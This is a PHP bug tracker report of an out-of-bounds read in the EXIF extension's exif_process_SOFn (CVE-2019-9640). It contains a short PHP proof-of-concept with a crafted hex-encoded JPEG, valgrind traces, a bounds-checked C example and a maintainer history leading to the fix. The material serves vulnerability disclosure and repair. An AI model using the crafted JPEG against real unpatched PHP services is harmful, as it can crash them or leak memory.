Sec Bug #77540 Invalid Read on exif_process_SOFn
Submitted: 2019-01-29 13:17 UTC Modified: 2019-03-12 19:55 UTC
From: chamal dot desilva at gmail dot com Assigned: stas (profile)
Status: Closed Package: EXIF related
PHP Version: 7.1.26 OS: Windows, Linux
Private report: No CVE-ID: 2019-9640

 [2019-01-29 13:17 UTC] chamal dot desilva at gmail dot com
Description:
------------
Version
-------
PHP 7.3.1
PHP 7.4.0-dev (cli)

Description
-----------
This bug is present in the exif_scan_thumbnail method of the ext/exif/exif.c file.
These lines in the exif_scan_thumbnail method cause this bug.

...
case M_SOF15:
        // exif_process_SOFn method reads 7 bytes from "uchar *data" pointer.
        // exif_process_SOFn or exif_scan_thumbnail methods don't validate
        // that "uchar *data" pointer has enough data to read.
        exif_process_SOFn(data+pos, marker, &sof_info);
....

Configure Line
---------------
./configure --prefix=/dir-name/install --enable-cli --enable-exif --enable-debug --without-pear




Test script:
---------------
<?php
$width = 0;
$height = 0;
$filename = dirname(__FILE__).DIRECTORY_SEPARATOR.'test.jpg';
file_put_contents($filename,hex2bin("ffd8e100554578696600004d4d002a0000000c00000000000000000012000302020001000000010500000001110001000000013d000000010100010000000101000000da00020000ffd8ffcf000000000000000000000000da0002"));
$s = exif_thumbnail($filename, $width, $height);
echo "Width ".$width."<br>";
echo "Height ".$height;
?>

Actual result:
--------------
Valgrind Output
---------------
Source line numbers are from PHP 7.3.1

export ZEND_DONT_UNLOAD_MODULES=1
export USE_ZEND_ALLOC=0
valgrind ./php/TestCases/test.php

==3659== Invalid read of size 1
==3659==    at 0x24C2E4: exif_process_SOFn (exif.c:2632)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccbe is 0 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A45B: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C2FA: exif_process_SOFn (exif.c:2633)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccbf is 1 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A46C: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C2FA: exif_process_SOFn (exif.c:2633)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc0 is 2 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A45B: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C311: exif_process_SOFn (exif.c:2634)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc1 is 3 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24A46C: php_jpg_get16 (exif.c:1437)
==3659==    by 0x24C311: exif_process_SOFn (exif.c:2634)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc2 is 4 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
==3659== 
==3659== Invalid read of size 1
==3659==    at 0x24C323: exif_process_SOFn (exif.c:2635)
==3659==    by 0x24F135: exif_scan_thumbnail (exif.c:3923)
==3659==    by 0x2521B3: zif_exif_thumbnail (exif.c:4654)
==3659==    by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690)
==3659==    by 0x59146D: execute_ex (zend_vm_execute.h:55418)
==3659==    by 0x59608D: zend_execute (zend_vm_execute.h:60834)
==3659==    by 0x4D2103: zend_execute_scripts (zend.c:1568)
==3659==    by 0x44904D: php_execute_script (main.c:2630)
==3659==    by 0x598C98: do_cli (php_cli.c:997)
==3659==    by 0x599E3F: main (php_cli.c:1389)
==3659==  Address 0x4d6ccc3 is 5 bytes after a block of size 6 alloc'd
==3659==    at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==3659==    by 0x4A0495: __zend_malloc (zend_alloc.c:2904)
==3659==    by 0x49F82D: _emalloc (zend_alloc.c:2494)
==3659==    by 0x49FD14: _estrndup (zend_alloc.c:2605)
==3659==    by 0x24CBB0: exif_thumbnail_extract (exif.c:2929)
==3659==    by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598)
==3659==    by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644)
==3659==    by 0x24EA03: exif_process_APP1 (exif.c:3669)
==3659==    by 0x24EECE: exif_scan_JPEG_header (exif.c:3814)
==3659==    by 0x24FDF5: exif_scan_FILE_header (exif.c:4203)
==3659==    by 0x250664: exif_read_from_impl (exif.c:4344)
==3659==    by 0x2506CF: exif_read_from_stream (exif.c:4361)
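The report above boils down to a SOFn reader that dereferences data[pos+2] through data[pos+7] without checking that those bytes exist inside the thumbnail buffer. The following is an added example, not PHP's own code: it mirrors the field layout a SOFn segment has (length, precision, height, width, component count) and shows the length check in front of the reads, exercised against a constructed 6-byte thumbnail like the "block of size 6" in the valgrind output. The struct, function and buffer names are the example's own.

```c
#include <stddef.h>

/* Fields a SOFn parser extracts; struct and function names are this example's own. */
typedef struct {
    int bits_per_sample;
    int height;
    int width;
    int num_components;
} sof_info_t;

/* JPEG marker segments store 16-bit values big-endian. */
static unsigned int get16_be(const unsigned char *p)
{
    return ((unsigned int)p[0] << 8) | p[1];
}

/* After its marker a SOFn segment is: length(2) precision(1) height(2) width(2) components(1),
 * so the reader touches data[pos+2] .. data[pos+7]. Reject the segment unless all 8 bytes lie
 * inside the buffer; this is the check the report says exif_scan_thumbnail lacks. */
int parse_sofn_checked(const unsigned char *data, size_t size, size_t pos, sof_info_t *out)
{
    if (size < 8 || pos > size - 8) {
        return -1;               /* truncated: the reads would run past the buffer */
    }
    const unsigned char *p = data + pos;
    out->bits_per_sample = p[2];
    out->height          = get16_be(p + 3);
    out->width           = get16_be(p + 5);
    out->num_components  = p[7];
    return 0;
}

/* Constructed 6-byte thumbnail: SOI, SOF15 marker (0xffcf), then two bytes and nothing more.
 * The marker sits at offset 2, so the segment body starts at pos = 4 and an unchecked reader
 * would read bytes 6..11, i.e. 0 to 5 bytes past the end, exactly as valgrind reported. */
int demo_truncated_thumbnail(void)
{
    const unsigned char thumb[6] = { 0xff, 0xd8, 0xff, 0xcf, 0x00, 0x00 };
    sof_info_t info;
    return parse_sofn_checked(thumb, sizeof thumb, 4, &info);   /* -1 */
}

/* Constructed well-formed SOF0: length 17, 8 bits/sample, 480x640, 3 components.
 * Returns width*height on success, -1 on rejection. */
long demo_valid_sof_pixels(void)
{
    const unsigned char seg[] = { 0xff, 0xc0, 0x00, 0x11, 0x08, 0x01, 0xe0, 0x02, 0x80, 0x03 };
    sof_info_t info;
    if (parse_sofn_checked(seg, sizeof seg, 2, &info) != 0) {
        return -1;
    }
    return (long)info.width * info.height;                       /* 307200 */
}
```

The same `size < 8 || pos > size - 8` form avoids the unsigned wrap-around that `pos + 8 > size` would suffer for very large pos values.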

History

 [2019-01-30 10:49 UTC] cmb@php.net
-Status: Open +Status: Verified -PHP Version: 7.3.1 +PHP Version: 7.1Git-2019-01-30 (Git)
 [2019-01-30 10:49 UTC] cmb@php.net
Thanks for reporting!  Apparently, all relevant versions (i.e. PHP-7.1+) are affected.
 [2019-03-02 21:39 UTC] stas@php.net
-Status: Verified +Status: Assigned -PHP Version: 7.1Git-2019-01-30 (Git) +PHP Version: 7.1.26 -Assigned To: +Assigned To: stas -CVE-ID: +CVE-ID: needed
 [2019-03-02 21:39 UTC] stas@php.net
Proposed fix in security repo as b079e1b50d8d0316f600477c5da55c81bb08b55f and in https://gist.github.com/smalyshev/4fb847b0da0a387f651aa393f1d22a96

Please verify.
 [2019-03-04 07:35 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=5f0e62a3e5b525163e538aaab0161c2c8c5d057b
Log: Fix bug #77540 - Invalid Read on exif_process_SOFn
 [2019-03-04 07:35 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2019-03-04 07:35 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=30d2b94a2e88021b77b07149e1f4438662ca8e5e
Log: Fix bug #77540 - Invalid Read on exif_process_SOFn
 [2019-03-12 08:28 UTC] chamal dot desilva at gmail dot com
Is it possible to add a CVE ID for this bug?
 [2019-03-12 19:55 UTC] stas@php.net
-CVE-ID: needed +CVE-ID: 2019-9640
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Sep 18 12:01:27 2024 UTC